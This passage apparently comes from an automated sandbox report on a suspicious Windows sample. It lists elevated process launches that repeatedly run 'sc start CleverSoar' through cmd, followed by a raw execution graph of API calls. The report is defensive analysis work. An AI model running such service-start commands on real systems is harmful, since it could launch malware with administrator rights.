                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:73
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:74
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:75
                            Start time:08:36:44
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:76
                            Start time:08:36:44
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:77
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:78
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:79
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:80
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:81
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:82
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:83
                            Start time:08:36:45
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:84
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:85
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:86
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:87
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:88
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:89
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:90
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:91
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:92
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:93
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:94
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:95
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:96
                            Start time:08:36:46
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:271
                            Start time:08:36:55
                            Start date:24/12/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15%
                              Total number of Nodes:833
                              Total number of Limit Nodes:9
                              execution_graph 93413 6c92d043 93414 6c92d06d 93413->93414 93415 6c92d055 __dosmaperr 93413->93415 93414->93415 93417 6c92d0e7 93414->93417 93418 6c92d0b8 __dosmaperr 93414->93418 93419 6c92d100 93417->93419 93420 6c92d11b __dosmaperr 93417->93420 93423 6c92d157 __wsopen_s 93417->93423 93460 6c920690 18 API calls __cftoe 93418->93460 93419->93420 93422 6c92d105 93419->93422 93453 6c920690 18 API calls __cftoe 93420->93453 93448 6c931f55 93422->93448 93454 6c924d2b HeapFree GetLastError __dosmaperr 93423->93454 93424 6c92d2ae 93427 6c92d324 93424->93427 93430 6c92d2c7 GetConsoleMode 93424->93430 93429 6c92d328 ReadFile 93427->93429 93428 6c92d177 93455 6c924d2b HeapFree GetLastError __dosmaperr 93428->93455 93432 6c92d342 93429->93432 93433 6c92d39c GetLastError 93429->93433 93430->93427 93434 6c92d2d8 93430->93434 93432->93433 93436 6c92d319 93432->93436 93446 6c92d132 __dosmaperr __wsopen_s 93433->93446 93434->93429 93437 6c92d2de ReadConsoleW 93434->93437 93435 6c92d17e 93435->93446 93456 6c92b1d9 20 API calls __wsopen_s 93435->93456 93441 6c92d367 93436->93441 93442 6c92d37e 93436->93442 93436->93446 93437->93436 93439 6c92d2fa GetLastError 93437->93439 93439->93446 93458 6c92d46e 23 API calls 3 library calls 93441->93458 93444 6c92d395 93442->93444 93442->93446 93459 6c92d726 21 API calls __wsopen_s 93444->93459 93457 6c924d2b HeapFree GetLastError __dosmaperr 93446->93457 93447 6c92d39a 93447->93446 93449 6c931f6f 93448->93449 93450 6c931f62 93448->93450 93451 6c931f7b 93449->93451 93461 6c920690 18 API calls __cftoe 93449->93461 93450->93424 93451->93424 93453->93446 93454->93428 93455->93435 93456->93422 93457->93415 93458->93446 93459->93447 93460->93415 93461->93450 93462 6c7a3b72 93475 6c916fb3 93462->93475 93465 6c7b639e 93541 6c9206a0 18 API calls 2 library calls 93465->93541 93471 6c7a37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 93471->93465 93489 6c90b430 93471->93489 93493 6c7b6ba0 93471->93493 93512 6c7b6e60 93471->93512 93522 6c7b7090 93471->93522 93535 6c7de010 93471->93535 93477 6c916fb8 93475->93477 93476 6c916fd2 93476->93471 93477->93476 93480 6c916fd4 std::_Facet_Register 93477->93480 93542 6c91f584 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 93477->93542 93479 6c917e33 std::_Facet_Register 93546 6c9198e9 RaiseException 93479->93546 93480->93479 93543 6c9198e9 RaiseException 93480->93543 93482 6c91862c IsProcessorFeaturePresent 93488 6c918651 93482->93488 93484 6c917df3 93544 6c9198e9 RaiseException 93484->93544 93486 6c917e13 std::invalid_argument::invalid_argument 93545 6c9198e9 RaiseException 93486->93545 93488->93471 93490 6c90b444 93489->93490 93491 6c90b446 FindFirstFileA 93489->93491 93490->93491 93492 6c90b480 93491->93492 93492->93471 93494 6c7b6bd5 93493->93494 93547 6c7e2020 93494->93547 93496 6c7b6c68 93497 6c916fb3 std::_Facet_Register 4 API calls 93496->93497 93498 6c7b6ca0 93497->93498 93564 6c917897 93498->93564 93500 6c7b6cb4 93576 6c7e1d90 93500->93576 93503 6c7b6d8e 93503->93471 93505 6c7b6dc8 93584 6c7e26e0 24 API calls 4 library calls 93505->93584 93507 6c7b6dda 93585 6c9198e9 RaiseException 93507->93585 93509 6c7b6def 93510 6c7de010 67 API calls 93509->93510 93511 6c7b6e0f 93510->93511 93511->93471 93513 6c7b6e9f 93512->93513 93516 6c7b6eb3 93513->93516 93976 6c7e3560 32 API calls std::_Xinvalid_argument 93513->93976 93519 6c7b6f5b 93516->93519 93978 6c7e2250 30 API calls 93516->93978 93979 6c7e26e0 24 API calls 4 library calls 93516->93979 93980 6c9198e9 RaiseException 93516->93980 93518 6c7b6f6e 93518->93471 93519->93518 93977 6c7e37e0 32 API calls std::_Xinvalid_argument 93519->93977 93523 6c7b709e 93522->93523 93527 6c7b70d1 93522->93527 93981 6c7e01f0 93523->93981 93525 6c7b7183 93525->93471 93527->93525 93985 6c7e2250 30 API calls 93527->93985 93529 6c921088 67 API calls 93529->93527 93530 6c7b71ae 93986 6c7e2340 24 API calls 93530->93986 93532 6c7b71be 93987 6c9198e9 RaiseException 93532->93987 93534 6c7b71c9 93536 6c7de04b 93535->93536 93537 6c7e01f0 64 API calls 93536->93537 93539 6c7de0a3 93536->93539 93538 6c7de098 93537->93538 93540 6c921088 67 API calls 93538->93540 93539->93471 93540->93539 93542->93477 93543->93484 93544->93486 93545->93479 93546->93482 93548 6c916fb3 std::_Facet_Register 4 API calls 93547->93548 93549 6c7e207e 93548->93549 93550 6c917897 43 API calls 93549->93550 93551 6c7e2092 93550->93551 93586 6c7e2f60 42 API calls 4 library calls 93551->93586 93553 6c7e210d 93556 6c7e2120 93553->93556 93587 6c9174fe 9 API calls 2 library calls 93553->93587 93554 6c7e20c8 93554->93553 93555 6c7e2136 93554->93555 93588 6c7e2250 30 API calls 93555->93588 93556->93496 93559 6c7e215b 93589 6c7e2340 24 API calls 93559->93589 93561 6c7e2171 93590 6c9198e9 RaiseException 93561->93590 93563 6c7e217c 93563->93496 93565 6c9178a3 __EH_prolog3 93564->93565 93591 6c917425 93565->93591 93570 6c9178c1 93605 6c91792a 39 API calls std::locale::_Setgloballocale 93570->93605 93571 6c91791c 93571->93500 93573 6c9178c9 93606 6c917721 HeapFree GetLastError _Yarn 93573->93606 93575 6c9178df 93597 6c917456 93575->93597 93577 6c7e1ddc 93576->93577 93578 6c7b6d5d 93576->93578 93611 6c9179b7 93577->93611 93578->93503 93583 6c7e2250 30 API calls 93578->93583 93582 6c7e1e82 93583->93505 93584->93507 93585->93509 93586->93554 93587->93556 93588->93559 93589->93561 93590->93563 93592 6c917434 93591->93592 93593 6c91743b 93591->93593 93607 6c92093d 6 API calls std::_Lockit::_Lockit 93592->93607 93595 6c917439 93593->93595 93608 6c918afb EnterCriticalSection 93593->93608 93595->93575 93604 6c9177a0 6 API calls 2 library calls 93595->93604 93598 6c917460 93597->93598 93599 6c92094b 93597->93599 93600 6c917473 93598->93600 93609 6c918b09 LeaveCriticalSection 93598->93609 93610 6c920926 LeaveCriticalSection 93599->93610 93600->93571 93603 6c920952 93603->93571 93604->93570 93605->93573 93606->93575 93607->93595 93608->93595 93609->93600 93610->93603 93612 6c9179c0 93611->93612 93615 6c7e1dea 93612->93615 93620 6c9202ba 93612->93620 93614 6c917a0c 93614->93615 93631 6c91ffc8 65 API calls 93614->93631 93615->93578 93619 6c91cad3 18 API calls __cftoe 93615->93619 93617 6c917a27 93617->93615 93632 6c921088 93617->93632 93619->93582 93622 6c9202c5 __wsopen_s 93620->93622 93621 6c9202d8 93657 6c920690 18 API calls __cftoe 93621->93657 93622->93621 93623 6c9202f8 93622->93623 93630 6c9202e8 93623->93630 93643 6c92b37c 93623->93643 93630->93614 93631->93617 93633 6c921094 __wsopen_s 93632->93633 93634 6c9210b3 93633->93634 93635 6c92109e 93633->93635 93642 6c9210ae 93634->93642 93838 6c91cb19 EnterCriticalSection 93634->93838 93853 6c920690 18 API calls __cftoe 93635->93853 93638 6c9210d0 93839 6c92110c 93638->93839 93640 6c9210db 93854 6c921102 LeaveCriticalSection 93640->93854 93642->93615 93644 6c92b388 __wsopen_s 93643->93644 93659 6c92090f EnterCriticalSection 93644->93659 93646 6c92b396 93660 6c92b420 93646->93660 93651 6c92b4e2 93652 6c92b601 93651->93652 93684 6c92b684 93652->93684 93655 6c92033c 93658 6c920365 LeaveCriticalSection 93655->93658 93657->93630 93658->93630 93659->93646 93668 6c92b443 93660->93668 93661 6c92b3a3 93674 6c92b3dc 93661->93674 93662 6c92b49b 93679 6c927755 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 93662->93679 93665 6c92b4a4 93680 6c924d2b HeapFree GetLastError __dosmaperr 93665->93680 93667 6c92b4ad 93667->93661 93681 6c92718f 6 API calls std::_Lockit::_Lockit 93667->93681 93668->93661 93668->93662 93668->93668 93677 6c91cb19 EnterCriticalSection 93668->93677 93678 6c91cb2d LeaveCriticalSection 93668->93678 93670 6c92b4cc 93682 6c91cb19 EnterCriticalSection 93670->93682 93673 6c92b4df 93673->93661 93683 6c920926 LeaveCriticalSection 93674->93683 93676 6c920313 93676->93630 93676->93651 93677->93668 93678->93668 93679->93665 93680->93667 93681->93670 93682->93673 93683->93676 93685 6c92b6a3 93684->93685 93686 6c92b6b6 93685->93686 93689 6c92b6cb 93685->93689 93700 6c920690 18 API calls __cftoe 93686->93700 93688 6c92b617 93688->93655 93697 6c93454e 93688->93697 93695 6c92b7eb 93689->93695 93701 6c934418 37 API calls __cftoe 93689->93701 93692 6c92b83b 93692->93695 93702 6c934418 37 API calls __cftoe 93692->93702 93694 6c92b859 93694->93695 93703 6c934418 37 API calls __cftoe 93694->93703 93695->93688 93704 6c920690 18 API calls __cftoe 93695->93704 93705 6c934906 93697->93705 93700->93688 93701->93692 93702->93694 93703->93695 93704->93688 93707 6c934912 __wsopen_s 93705->93707 93706 6c934919 93723 6c920690 18 API calls __cftoe 93706->93723 93707->93706 93708 6c934944 93707->93708 93714 6c93456e 93708->93714 93713 6c934569 93713->93655 93725 6c920c3b 93714->93725 93719 6c9345a4 93721 6c9345d6 93719->93721 93765 6c924d2b HeapFree GetLastError __dosmaperr 93719->93765 93724 6c93499b LeaveCriticalSection __wsopen_s 93721->93724 93723->93713 93724->93713 93766 6c91c25b 93725->93766 93727 6c920c5f 93730 6c91c366 93727->93730 93775 6c91c3be 93730->93775 93732 6c91c37e 93732->93719 93733 6c9345dc 93732->93733 93790 6c934a5c 93733->93790 93739 6c934702 GetFileType 93742 6c934754 93739->93742 93743 6c93470d GetLastError 93739->93743 93740 6c93460e __dosmaperr 93740->93719 93741 6c9346d7 GetLastError 93741->93740 93820 6c931d20 SetStdHandle __dosmaperr __wsopen_s 93742->93820 93819 6c91ff62 __dosmaperr 93743->93819 93744 6c934685 93744->93739 93744->93741 93818 6c9349c7 CreateFileW 93744->93818 93747 6c93471b CloseHandle 93747->93740 93764 6c934744 93747->93764 93749 6c9346ca 93749->93739 93749->93741 93750 6c934775 93751 6c9347c1 93750->93751 93821 6c934bd6 70 API calls 2 library calls 93750->93821 93755 6c9347c8 93751->93755 93835 6c934c80 70 API calls 2 library calls 93751->93835 93754 6c9347f6 93754->93755 93756 6c934804 93754->93756 93822 6c92be95 93755->93822 93756->93740 93758 6c934880 CloseHandle 93756->93758 93836 6c9349c7 CreateFileW 93758->93836 93760 6c9348ab 93761 6c9348b5 GetLastError 93760->93761 93760->93764 93762 6c9348c1 __dosmaperr 93761->93762 93837 6c931c8f SetStdHandle __dosmaperr __wsopen_s 93762->93837 93764->93740 93765->93721 93767 6c91c27b 93766->93767 93773 6c91c272 93766->93773 93768 6c924f22 __Getctype 37 API calls 93767->93768 93767->93773 93769 6c91c29b 93768->93769 93770 6c925498 __Getctype 37 API calls 93769->93770 93771 6c91c2b1 93770->93771 93772 6c9254c5 __fassign 37 API calls 93771->93772 93772->93773 93773->93727 93774 6c926f45 5 API calls std::_Lockit::_Lockit 93773->93774 93774->93727 93776 6c91c3e6 93775->93776 93777 6c91c3cc 93775->93777 93779 6c91c3ed 93776->93779 93780 6c91c40c 93776->93780 93778 6c91c34c __wsopen_s HeapFree GetLastError 93777->93778 93785 6c91c3d6 __dosmaperr 93778->93785 93783 6c91c30d __wsopen_s HeapFree GetLastError 93779->93783 93779->93785 93781 6c924db3 __fassign MultiByteToWideChar 93780->93781 93782 6c91c41b 93781->93782 93784 6c91c422 GetLastError 93782->93784 93786 6c91c448 93782->93786 93787 6c91c30d __wsopen_s HeapFree GetLastError 93782->93787 93783->93785 93784->93785 93785->93732 93786->93785 93788 6c924db3 __fassign MultiByteToWideChar 93786->93788 93787->93786 93789 6c91c45f 93788->93789 93789->93784 93789->93785 93791 6c934a97 93790->93791 93793 6c934a7d 93790->93793 93792 6c9349ec __wsopen_s 18 API calls 93791->93792 93798 6c934acf 93792->93798 93793->93791 93794 6c920690 __cftoe 18 API calls 93793->93794 93794->93791 93795 6c9345f9 93795->93740 93804 6c931b7c 93795->93804 93796 6c934afe 93796->93795 93797 6c935e81 __wsopen_s 18 API calls 93796->93797 93799 6c934b4c 93797->93799 93798->93796 93801 6c920690 __cftoe 18 API calls 93798->93801 93799->93795 93800 6c934bc9 93799->93800 93802 6c9206bd __Getctype 11 API calls 93800->93802 93801->93796 93803 6c934bd5 93802->93803 93805 6c931b88 __wsopen_s 93804->93805 93806 6c92090f std::_Lockit::_Lockit EnterCriticalSection 93805->93806 93809 6c931b8f 93806->93809 93807 6c931c86 __wsopen_s LeaveCriticalSection 93810 6c931bf6 93807->93810 93808 6c931bb4 93811 6c931db2 __wsopen_s 11 API calls 93808->93811 93809->93808 93813 6c931c23 EnterCriticalSection 93809->93813 93815 6c931bd6 93809->93815 93810->93740 93817 6c9349c7 CreateFileW 93810->93817 93812 6c931bb9 93811->93812 93814 6c931f00 __wsopen_s EnterCriticalSection 93812->93814 93812->93815 93813->93815 93816 6c931c30 LeaveCriticalSection 93813->93816 93814->93815 93815->93807 93816->93809 93817->93744 93818->93749 93819->93747 93820->93750 93821->93751 93823 6c931b12 __wsopen_s 18 API calls 93822->93823 93826 6c92bea5 93823->93826 93824 6c92beab 93825 6c931c8f __wsopen_s SetStdHandle 93824->93825 93834 6c92bf03 __dosmaperr 93825->93834 93826->93824 93827 6c92bedd 93826->93827 93829 6c931b12 __wsopen_s 18 API calls 93826->93829 93827->93824 93828 6c931b12 __wsopen_s 18 API calls 93827->93828 93831 6c92bee9 CloseHandle 93828->93831 93830 6c92bed4 93829->93830 93832 6c931b12 __wsopen_s 18 API calls 93830->93832 93831->93824 93833 6c92bef5 GetLastError 93831->93833 93832->93827 93833->93824 93834->93740 93835->93754 93836->93760 93837->93764 93838->93638 93840 6c921119 93839->93840 93841 6c92112e 93839->93841 93877 6c920690 18 API calls __cftoe 93840->93877 93844 6c921129 93841->93844 93855 6c921229 93841->93855 93844->93640 93849 6c921151 93870 6c92be08 93849->93870 93851 6c921157 93851->93844 93878 6c924d2b HeapFree GetLastError __dosmaperr 93851->93878 93853->93642 93854->93642 93856 6c921241 93855->93856 93860 6c921143 93855->93860 93857 6c92a1d0 18 API calls 93856->93857 93856->93860 93858 6c92125f 93857->93858 93879 6c92c0dc 93858->93879 93861 6c928cae 93860->93861 93862 6c928cc5 93861->93862 93863 6c92114b 93861->93863 93862->93863 93963 6c924d2b HeapFree GetLastError __dosmaperr 93862->93963 93865 6c92a1d0 93863->93865 93866 6c92a1f1 93865->93866 93867 6c92a1dc 93865->93867 93866->93849 93964 6c920690 18 API calls __cftoe 93867->93964 93869 6c92a1ec 93869->93849 93871 6c92be2e 93870->93871 93873 6c92be19 __dosmaperr 93870->93873 93872 6c92be77 __dosmaperr 93871->93872 93874 6c92be55 93871->93874 93973 6c920690 18 API calls __cftoe 93872->93973 93873->93851 93965 6c92bf31 93874->93965 93877->93844 93878->93844 93880 6c92c0e8 __wsopen_s 93879->93880 93881 6c92c13a 93880->93881 93882 6c92c1a3 __dosmaperr 93880->93882 93889 6c92c0f0 __dosmaperr 93880->93889 93890 6c931f00 EnterCriticalSection 93881->93890 93920 6c920690 18 API calls __cftoe 93882->93920 93884 6c92c140 93887 6c92c15c __dosmaperr 93884->93887 93891 6c92c1ce 93884->93891 93919 6c92c19b LeaveCriticalSection __wsopen_s 93887->93919 93889->93860 93890->93884 93892 6c92c1f0 93891->93892 93918 6c92c20c __dosmaperr 93891->93918 93893 6c92c244 93892->93893 93895 6c92c1f4 __dosmaperr 93892->93895 93894 6c92c257 93893->93894 93929 6c92b1d9 20 API calls __wsopen_s 93893->93929 93921 6c92c3b0 93894->93921 93928 6c920690 18 API calls __cftoe 93895->93928 93900 6c92c2ac 93902 6c92c2c0 93900->93902 93903 6c92c305 WriteFile 93900->93903 93901 6c92c26d 93904 6c92c271 93901->93904 93905 6c92c296 93901->93905 93906 6c92c2f5 93902->93906 93907 6c92c2cb 93902->93907 93908 6c92c329 GetLastError 93903->93908 93903->93918 93904->93918 93930 6c92c7cb 6 API calls __wsopen_s 93904->93930 93931 6c92c421 43 API calls 5 library calls 93905->93931 93934 6c92c833 7 API calls 2 library calls 93906->93934 93910 6c92c2d0 93907->93910 93911 6c92c2e5 93907->93911 93908->93918 93914 6c92c2d5 93910->93914 93910->93918 93933 6c92c9f7 8 API calls 3 library calls 93911->93933 93932 6c92c90e 7 API calls 2 library calls 93914->93932 93916 6c92c2e3 93916->93918 93918->93887 93919->93889 93920->93889 93922 6c931f55 __wsopen_s 18 API calls 93921->93922 93923 6c92c3c1 93922->93923 93924 6c92c268 93923->93924 93935 6c924f22 GetLastError 93923->93935 93924->93900 93924->93901 93927 6c92c3fe GetConsoleMode 93927->93924 93928->93918 93929->93894 93930->93918 93931->93918 93932->93916 93933->93916 93934->93916 93936 6c924f3f 93935->93936 93937 6c924f39 93935->93937 93939 6c9270d2 __Getctype 6 API calls 93936->93939 93941 6c924f45 SetLastError 93936->93941 93938 6c927093 __Getctype 6 API calls 93937->93938 93938->93936 93940 6c924f5d 93939->93940 93940->93941 93942 6c924f61 93940->93942 93946 6c924fd3 93941->93946 93947 6c924fd9 93941->93947 93943 6c927755 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 93942->93943 93945 6c924f6d 93943->93945 93948 6c924f75 93945->93948 93949 6c924f8c 93945->93949 93946->93924 93946->93927 93951 6c921039 __Getctype 35 API calls 93947->93951 93950 6c9270d2 __Getctype 6 API calls 93948->93950 93952 6c9270d2 __Getctype 6 API calls 93949->93952 93953 6c924f83 93950->93953 93954 6c924fde 93951->93954 93955 6c924f98 93952->93955 93958 6c924d2b _free HeapFree GetLastError 93953->93958 93956 6c924f9c 93955->93956 93957 6c924fad 93955->93957 93959 6c9270d2 __Getctype 6 API calls 93956->93959 93961 6c924d2b _free HeapFree GetLastError 93957->93961 93960 6c924f89 93958->93960 93959->93953 93960->93941 93962 6c924fbf 93961->93962 93962->93941 93963->93863 93964->93869 93966 6c92bf3d __wsopen_s 93965->93966 93974 6c931f00 EnterCriticalSection 93966->93974 93968 6c92bf4b 93969 6c92be95 __wsopen_s 21 API calls 93968->93969 93970 6c92bf78 93968->93970 93969->93970 93975 6c92bfb1 LeaveCriticalSection __wsopen_s 93970->93975 93972 6c92bf9a 93972->93873 93973->93873 93974->93968 93975->93972 93976->93516 93977->93518 93978->93516 93979->93516 93980->93516 93982 6c7e022e 93981->93982 93983 